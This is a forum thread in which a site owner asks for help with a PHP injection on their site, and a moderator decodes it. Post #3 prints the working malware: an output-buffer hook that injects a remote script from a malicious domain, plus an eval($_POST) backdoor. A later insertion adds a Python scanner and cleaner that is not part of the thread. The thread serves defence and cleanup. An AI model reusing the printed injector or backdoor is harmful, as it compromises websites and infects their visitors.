  1. #1 SitePoint Member (joined May 2009)

    Found Virus attack on site any help

    My site suddenly stopped working.

    I checked and found this code in the site.

    Can anybody tell me why it is there, how to fix it, how the site got this attack, and how to stop it from happening again?

    Here is the code in the file:

    PHP Code:
    <?php eval(base64_decode('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')); ?>
    Last edited by spikeZ; Oct 15, 2009 at 09:46. Reason: trimmed the code a bit ;)

  2. #2 SitePoint Guru (joined Jan 2005, location: heaven)
    -.- fail...

  3. #3 spikeZ (joined Aug 2004, Manchester UK)
    OK, so let's see...
    It is a base64-encoded string that is evaluated and looks like:

    Code:
    if(!isset($hvujx1)){function hvujx($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL21hbHdhZ3JhbWluYmFuay5jb20vcGhvdG9nYWxsZXJ5L2Y1LnBocCA+PC9zY3JpcHQ+'),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function hvujx2($a,$b,$c,$d){global $hvujx1;$s=array();if(function_exists($hvujx1))call_user_func($hvujx1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='hvujx')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('hvujx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$hvujxl=(($a=@set_error_handler('hvujx2'))!='hvujx2')?$a:0;
    with
    Code:
    eval(base64_decode($_POST['e']));<script src=http://****.com/photogallery/f5.php ></script>
    So basically you have been injected via an input form or file upload that is rewriting your page, inserting an iframe, pulling from some dodgy site and overwriting your scripts.

    Check all your form inputs, file uploads or remote scripts served from a different server.
    Mike Swiffin - Community Team Advisor

  4. #4 SitePoint Enthusiast (joined Dec 2008, Idaho)
    I just got done fixing this exact problem on my brother's website the other day. Supposedly there is a weakness in open source applications. osCommerce and Joomla seem to get hit a lot. The site I fixed was on Joomla. You'll need to find where the infected file is on your server. All that code you see at the top of your scripts is pointing to some file on your server. That one infected file on your server will go through all your scripts and make sure the infected code is added to all of them, so if you delete it, then it just puts it back. So you need to find the root file and delete it for good.

    I think once you get rid of that root file you will be OK (it shouldn't spread anymore), but I downloaded all of the files anyway and did a search and replace on all (10,000) of the files and removed that piece of code at the top just to make sure. Took me about 6 hours to do everything... but it's back up and running now.

    From looking at your code, it looks like it is getting a file from another server through Javascript, so just deleting each piece of code from your scripts should probably stop it.

    One tip to keep this from happening is to put all of your directories on 755 permissions or lower, and all your files at 644 permissions or lower.
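    An added scanner and cleaner, not from this thread or from any poster, that does what posts #3 and #4 describe by hand: it walks a site tree, finds the `eval(base64_decode('...'))` prefix, decodes the payload to look for the output-buffer and error-handler hooks spikeZ decoded, and strips the prefix from each file. The sample tree, its payload and the placeholder domain are constructed here for the demo.

```python
import base64
import os
import re
import tempfile

# The injected prefix seen in post #1: <?php eval(base64_decode('...')); ?>
INJECT_RE = re.compile(r"<\?php\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>")

# Strings spikeZ's decoded payload contains: it hooks the error handler and
# output buffers so every page gets a remote <script> appended on the way out.
INDICATORS = ("set_error_handler", "ob_start", "<script src=", "<iframe", "$_POST")


def decode_payload(b64):
    """Decode the base64 argument; return '' if it is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return ""


def inspect_file(path):
    """Return [(matched prefix, indicators found in decoded payload), ...]."""
    with open(path, encoding="latin-1") as fh:
        text = fh.read()
    return [(m.group(0), [i for i in INDICATORS if i in decode_payload(m.group(1))])
            for m in INJECT_RE.finditer(text)]


def scan_tree(root):
    """Map relative path -> hits for every .php file carrying the prefix."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.endswith(".php") and inspect_file(full):
                report[os.path.relpath(full, root)] = inspect_file(full)
    return report


def clean_file(path):
    """Remove the injected prefix in place (post #4's search-and-replace); return count."""
    with open(path, encoding="latin-1") as fh:
        new, n = INJECT_RE.subn("", fh.read())
    if n:
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(new)
    return n


def demo():
    """Constructed sample: one infected and one clean file; returns (before, removed, after)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "inc"))
    payload = base64.b64encode(b"set_error_handler('h'); ob_start('h'); "
                               b"echo '<script src=http://EXAMPLE-PLACEHOLDER/photogallery/f5.php></script>';").decode()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php eval(base64_decode('%s')); ?><?php echo 'site'; ?>" % payload)
    with open(os.path.join(root, "inc", "clean.php"), "w") as fh:
        fh.write("<?php echo 'fine'; ?>")
    before = scan_tree(root)
    removed = sum(clean_file(os.path.join(root, p)) for p in before)
    return before, removed, scan_tree(root)
```

    Cleaning the prefix is only the visible symptom; as post #4 notes, the dropper that re-adds it and, per post #7, the stolen FTP credentials must be dealt with as well.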

  5. #5 SitePoint Member (joined May 2009)
    Did all this; even the file has 444 (read-only) permissions, and still it got this issue again.

    Can anyone suggest why it is, and where the issue is in my files, or what?

    And how can I get rid of this?

  6. #6 Mounty, SitePoint Enthusiast (joined Mar 2008, UK)
    I know this is a few weeks old now but I'm also confused! If the infected script has 755 permissions (so read / execute only for others) then surely no one would be able to write malicious code into the script through the web? Or could a bug found in Joomla etc facilitate such actions?

  7. #7 Non-Member (joined Oct 2009)
    It is better to change FTP passwords immediately and do a virus check on your computer.
    Some trojan program may steal the FTP password stored in the client data and put this code on the site.
